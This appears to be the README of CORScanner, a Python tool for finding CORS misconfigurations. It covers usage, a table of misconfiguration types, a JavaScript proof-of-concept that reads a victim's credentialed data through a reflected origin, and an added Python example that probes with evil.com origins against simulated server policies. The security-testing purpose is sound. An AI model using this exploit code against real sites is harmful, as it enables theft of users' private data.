Fast CORS misconfiguration vulnerability scanner 🍻

About CORScanner

CORScanner is a Python tool designed to discover CORS misconfiguration vulnerabilities in websites. It helps website administrators and penetration testers check whether the domains/URLs they are targeting have insecure CORS policies.


  • Fast. It uses gevent instead of Python threads for concurrency, which is much faster for network scanning.
  • Comprehensive. It covers all the common types of CORS misconfigurations we know.
  • Flexible. It supports various user-defined options (e.g. file output), which is helpful for large-scale scanning.

Two useful references for understanding CORS systematically:




  • Download this tool
git clone
  • Install dependencies
sudo pip install -r requirements.txt

CORScanner depends on the requests, gevent, tld, colorama and argparse python modules.

Python Version:

  • Both Python 2 (2.7.x) and Python 3 (3.7.x) are supported.


Short Form  Long Form   Description
-u          --url       URL/domain whose CORS policy is to be checked
-d          --headers   Add headers to the request
-i          --input     File containing the list of URLs/domains to check
-t          --threads   Number of threads to use for the CORS scan
-o          --output    Save the results to a JSON file
-v          --verbose   Enable verbose mode and display results in real time
-h          --help      Show the help message and exit


  • To check CORS misconfigurations of specific domain:

python -u

  • To check CORS misconfigurations of specific URL:

python -u

  • To check CORS misconfiguration with specific headers:

python -u -d "Cookie: test"

  • To check CORS misconfigurations of multiple domains/URLs:

python -i top_100_domains.txt -t 100

  • To list all the basic options and switches use -h switch:

python -h

Misconfiguration types

This tool covers the following misconfiguration types:

Misconfiguration type   Description
Reflect_any_origin      Blindly reflects the Origin header value in the Access-Control-Allow-Origin response header, so any website can read the site's secrets by sending cross-origin requests.
Prefix_match            trusts, which is an attacker's domain.
Suffix_match            trusts, which could be registered by an attacker.
Not_escape_dot          trusts, which could be registered by an attacker.
Substring match         trusts, which could be registered by an attacker.
Trust_null              trusts null, an origin any attacker can produce with a sandboxed iframe.
HTTPS_trust_HTTP        Risky trust dependency: an HTTPS site trusts its HTTP origin, so a MITM attacker may steal the HTTPS site's secrets.
Trust_any_subdomain     Risky trust dependency: an XSS on any subdomain may steal the site's secrets.
custom_third_parties    Custom unsafe third-party origins; see the origins.json file for the list. Thanks @phackt!

Contributions of further misconfiguration types are welcome.

Exploitation examples

Here is an example of how to exploit the "Reflect_any_origin" misconfiguration. Secrets on the affected site can be read by any malicious website (in the demo, localhost plays the malicious website). Video on YouTube:


Here is the exploitation code:

    // Send a cross-origin request to the server when a victim visits the page.
    var req = new XMLHttpRequest();
    // The target URL (the vulnerable endpoint of the affected site) is omitted here.
    req.open('GET', "", true);
    req.onload = stealData;
    req.withCredentials = true;   // send the victim's cookies with the request
    req.send(null);

    function stealData(){
        // Reading the response is allowed because of the CORS misconfiguration.
        var data = JSON.stringify(JSON.parse(this.responseText), null, 2);

        // Display the data on the page. A real attacker would send it to his own server.
        output(data);
    }

    function output(inp) {
        document.body.appendChild(document.createElement('pre')).innerHTML = inp;
    }

If you have understood how the demo works, read Section 5 and Section 6 of the CORS paper to learn how to exploit the other misconfigurations.
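The following is an added example, not CORScanner's own code, that shows how the misconfiguration classes in the table above are detected in practice and why the demo's Reflect_any_origin bug is exploitable: a probe Origin is derived from the target for each class, the server's response is checked for an exact Access-Control-Allow-Origin echo together with Access-Control-Allow-Credentials: true, and the class whose probe got through is reported. Instead of real HTTP round trips it simulates a few server-side origin checks as Python functions (a reflect-everything policy, a regex with an unescaped dot and no end anchor, an endswith() check, and an exact-match allowlist that fixes all of them). The target www.example.com, the attacker domain evil.com and the concrete probe strings are this example's own assumptions; the probe shapes mirror the table but are not CORScanner's implementation.

```python
import re
from urllib.parse import urlsplit

# Hypothetical attacker-controlled domain used to build probe origins (assumption).
ATTACKER_DOMAIN = "evil.com"


def probe_origins(target_url):
    """Derive one probe Origin per misconfiguration class for target_url.

    The probe shapes follow the classes in the table above; the concrete strings
    (evil.com, the 'a' substituted for the first dot, ...) are this example's own.
    """
    parts = urlsplit(target_url)
    scheme, host = parts.scheme, parts.hostname
    root = ".".join(host.split(".")[-2:])  # naive registrable domain, e.g. example.com
    probes = {
        "Reflect_any_origin":  f"{scheme}://{ATTACKER_DOMAIN}",
        "Prefix_match":        f"{scheme}://{host}.{ATTACKER_DOMAIN}",
        "Suffix_match":        f"{scheme}://evil{root}",
        "Not_escape_dot":      f"{scheme}://{host.replace('.', 'a', 1)}",
        "Substring_match":     f"{scheme}://{host[:-1]}",
        "Trust_null":          "null",
        "Trust_any_subdomain": f"{scheme}://evil.{host}",
    }
    if scheme == "https":
        probes["HTTPS_trust_HTTP"] = f"http://{host}"
    return probes


def is_exploitable(origin, acao, acac):
    """Credentialed data leaks to `origin` only if a browser would accept the
    response: ACAO must echo the origin exactly (browsers refuse '*' when
    credentials are sent) and Access-Control-Allow-Credentials must be true."""
    return acao == origin and (acac or "").lower() == "true"


def scan(policy, target_url):
    """Run every probe against a server policy and return the classes that fire.

    `policy(origin)` stands in for the HTTP round trip: it returns the
    (Access-Control-Allow-Origin, Access-Control-Allow-Credentials) pair the
    server would send for that Origin request header.
    """
    probes = probe_origins(target_url)
    # Reflecting an arbitrary origin subsumes every other class, so report it alone.
    reflect = probes.pop("Reflect_any_origin")
    if is_exploitable(reflect, *policy(reflect)):
        return ["Reflect_any_origin"]
    return [name for name, origin in probes.items()
            if is_exploitable(origin, *policy(origin))]


# --- Simulated server policies (constructed for this example) -------------------

def reflect_any_policy(origin):
    # The bug exploited in the demo above: whatever Origin arrives is echoed back.
    return origin, "true"

def unescaped_regex_policy(origin):
    # Means to allow only https://www.example.com; the unescaped '.' and the
    # missing '$' anchor turn it into a prefix check that also accepts 'wwwa...'.
    if re.match(r"^https://www.example.com", origin):
        return origin, "true"
    return None, None

def endswith_policy(origin):
    # Means to allow *.example.com but ignores the scheme and the dot boundary.
    if origin.endswith("example.com"):
        return origin, "true"
    return None, None

def safe_policy(origin):
    # Exact-match allowlist: the fix. Send 'Vary: Origin' alongside it on the wire.
    allowed = {"https://www.example.com", "https://app.example.com"}
    if origin in allowed:
        return origin, "true"
    return None, None


if __name__ == "__main__":
    for name, policy in [("reflect", reflect_any_policy), ("regex", unescaped_regex_policy),
                         ("endswith", endswith_policy), ("safe", safe_policy)]:
        print(f"{name:>9}: {scan(policy, 'https://www.example.com')}")
```

One probe can satisfy several broken checks at once (wwwaexample.com also ends with example.com), so a single sloppy policy is usually reported under more than one class; that is expected, and the exact-match allowlist is what clears all of them. When scanning a real server, also confirm the credentials header: an echoed Origin without Access-Control-Allow-Credentials: true exposes only data the site already serves anonymously.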


CORScanner is licensed under the MIT license. Take a look at the LICENSE file for more information.


This work is inspired by the following excellent research:

  • James Kettle, "Exploiting CORS misconfigurations for Bitcoins and bounties", AppSecUSA 2016
  • Evan Johnson, "Misconfigured CORS and why web appsec is not getting easier", AppSecUSA 2016
  • Jens Müller, "CORS misconfigurations on a large scale", CORStest


Current version is 1.0
